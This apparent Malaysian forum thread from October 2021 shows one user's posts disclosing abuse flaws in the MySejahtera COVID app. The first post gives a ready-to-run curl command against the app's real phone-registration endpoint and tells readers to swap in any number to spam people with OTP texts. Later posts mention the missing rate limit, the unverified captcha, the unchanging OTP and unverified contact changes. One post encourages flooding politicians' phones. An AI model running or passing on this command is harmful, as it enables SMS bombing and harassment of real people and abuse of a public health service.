MySejahtera Not So Sejahtera, Full of Exploits
|
|
 Oct 18 2021, 01:51 PM, updated 5y ago
Return to original view | IPv6 | Post
#1
|
 
Senior Member
1,258 posts Joined: Dec 2008 From: /k/ 
|
You can instruct "MySejahtera" to spam OTP to others at will. Just run the following code at terminal of choice and change contact number (Window user pandai pandai tukar la )
CODE curl --location --request POST 'https://mysejahtera.malaysia.gov.my/checkin/registerPhone' \ --form 'countryCode="60"' \ --form 'contactNumber="12345678"' |
|
|
|
|
|
Oct 18 2021, 02:13 PM
Return to original view | IPv6 | Post
#2
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(imin @ Oct 18 2021, 02:04 PM) I'm not testing if this really work, but if it is, then the backend looks like it's developed by some intern IT student Go ahead and try, the URL is legit anyways. Can use Postman or other tools as well, as long as you send that form-data, it works. These mistake are worse than interns lol. QUOTE(kidmad @ Oct 18 2021, 02:08 PM) this api should not even be exposed! it's supposed to be called by a backend module! .. They kinda forget to verify the captcha actually. They have Captcha at the page, but backend doesn't verify that token. |
|
|
Oct 18 2021, 02:15 PM
Return to original view | IPv6 | Post
#3
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(WaCKy-Angel @ Oct 18 2021, 02:12 PM) do u even need exploit? There are no rate limit, meaning you can repeatedly keep on request OTP with a simple scripts.ayam thought u can just try login with the number and the app will send otp? Triggering OTP is not the issue, the issue is lack of Authentication/Authorization token. Maybe that's the implementor have the same thought as you. Also, the OTP token never change, at least for the past 19 hours that i had been spamming myself. This post has been edited by Darkripper: Oct 18 2021, 02:16 PM |
|
|
Oct 18 2021, 02:27 PM
Return to original view | IPv6 | Post
#4
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(kidmad @ Oct 18 2021, 02:23 PM) to send notification they can just use something like big ip f5 to whitelist only allowed IP address could access the endpoints. infact just build the service separate and segregation between internal and external network. They can't do that, as that's the endpoint that client side is calling to trigger it. Eaiest way is just to rate limit + some kind of Captcha. That would reduce the exposure to an acceptable limit.QUOTE(WaCKy-Angel @ Oct 18 2021, 02:24 PM) A simple captcha will not be sufficient to block hacker. It wont solve all, but it reduces the exposure.Anyway security vs convenient has always been a mouse and cat game. The more u do the more hacker wants to find exploit lol. |
|
|
Oct 18 2021, 02:37 PM
Return to original view | IPv6 | Post
#5
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(jmas @ Oct 18 2021, 02:29 PM) i tot already debunked that 70mil does not include mysejahtera? Cost is not the question here. This is a critical app required by most residents in Malaysia, cannot compromise on security yo. Imagine a data-breach? QUOTE(kons @ Oct 18 2021, 02:32 PM) tengine webserver... I see you're man of culture here. Jquery hurts my eye tho.twitter bootstrap.. google font api... owl carousel.. jquery... all free stuff but cost 70m... thanks to our competent gomen. |
|
|
Oct 18 2021, 02:37 PM
Return to original view | IPv6 | Post
#6
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(WaCKy-Angel @ Oct 18 2021, 02:34 PM) iinm mysejahtera was developed merely for check-in purposes but now has become more important. tweeted, still no news yet. So yeahofcourse security wise is not top priority back then. Why not u tweet KJ about this and see what actions he will take? |
|
|
|
|
|
Oct 18 2021, 02:40 PM
Return to original view | IPv6 | Post
#7
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(WaCKy-Angel @ Oct 18 2021, 02:38 PM) slowly lah wait he think of a good cum back like dajjal hahahaha Btw seems like the dev is fixing, some of the other exploits is getting patched. But still doesn't give much confidence when they don't acknowledge it.who knows later he will employ u as their Security consultant eh This post has been edited by Darkripper: Oct 18 2021, 02:40 PM |
|
|
Oct 18 2021, 02:46 PM
Return to original view | IPv6 | Post
#8
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(jmas @ Oct 18 2021, 02:43 PM) not denying the app is critical, just correcting the fact that ppl thought the apps cost 70mil to develop and discounting the effort of the developers Good to do it for free, the issue is on Govt for not ensuring quality in such a critical application. Devs are probably getting squeezed also la.but the truth is the developer was doing this for free (initially) and I think only officially get paid around end of last year/early this year |
|
|
Oct 18 2021, 11:13 PM
Return to original view | IPv6 | Post
#9
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(kidmad @ Oct 18 2021, 08:19 PM) client side to trigger? it don't work that way. the service i work on sents millions of sms daily. we are the one triggering to an end point expose by the provider. mysejahtera would have the list of contact on their end. all they need to do is periodically send the sms via to end point expose by the few operator we have. you're talking about their backend implementation, which is out-of-reach. Client trigger mysejahtera, which in turn they forward it to provider. It doesn't matter how the backend is implemented if they open their doors wide open.if it's really trigger by us who has mysejahtera that's stupid |
|
|
Oct 19 2021, 02:46 AM
Return to original view | IPv6 | Post
#10
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(TruboXL @ Oct 19 2021, 01:23 AM) Spamming KJ phone number will ruckle some feathers QUOTE(IJustWantToAsk @ Oct 19 2021, 02:37 AM) If you want, go bombard those politicians phone number PM me their number lor. Its a curl command, you can try it for yourself. Its pretty much copy paste run.See if this really works QUOTE(God Grid @ Oct 19 2021, 02:33 AM) What's wrong with jQuery? Hmmm... Its time had passed.  |
|
|
Oct 19 2021, 02:51 AM
Return to original view | IPv6 | Post
#11
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(God Grid @ Oct 19 2021, 02:47 AM) How bad is it? I dunno frontend, so no idea jquery is top go-to library when everyone is manually manipulating HTML elements for frontend, it is easier to use than vanilla JS. It is not bad, just it is not that relevant anymore.I mean, there are other frameworks like React, Vue and Angular, but those are not UI only right? Then SPA like Angular, React comes along, which is easier to code, a little bit more structured and efficient. The best thing about SPA is there is less page refresh, providing a better UX. Now you even have Vue, Svelte, SolidJS which is trying to overtake React. Its not just for UI, but for client-side aka frontend to render and do whatever it needs to (communicate with server, service worker to run some shit in the background) This post has been edited by Darkripper: Oct 19 2021, 02:52 AM |
|
|
Oct 20 2021, 04:46 PM
Return to original view | IPv6 | Post
#12
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(brkli @ Oct 20 2021, 04:05 PM) kesian TS... What? |
|
|
Oct 21 2021, 02:57 PM
Return to original view | IPv6 | Post
#13
|
|
Senior Member
1,258 posts Joined: Dec 2008 From: /k/
|
QUOTE(IamNOT @ Oct 21 2021, 10:40 AM) Fxxk... The change email/phone no do not require verification from old email/phone no..... Security 404... Use throw away email also useless... aiya, they say its a feature that get exposed. lel... *FEATURE*.Btw they haven't fix yet also, just add reCAPTCHA, which can be solved using API also |
| Change to: |  0.0150sec
 0.55
 6 queries
 GZIP Disabled
Time is now: 24th November 2025 - 04:18 PM |
Quote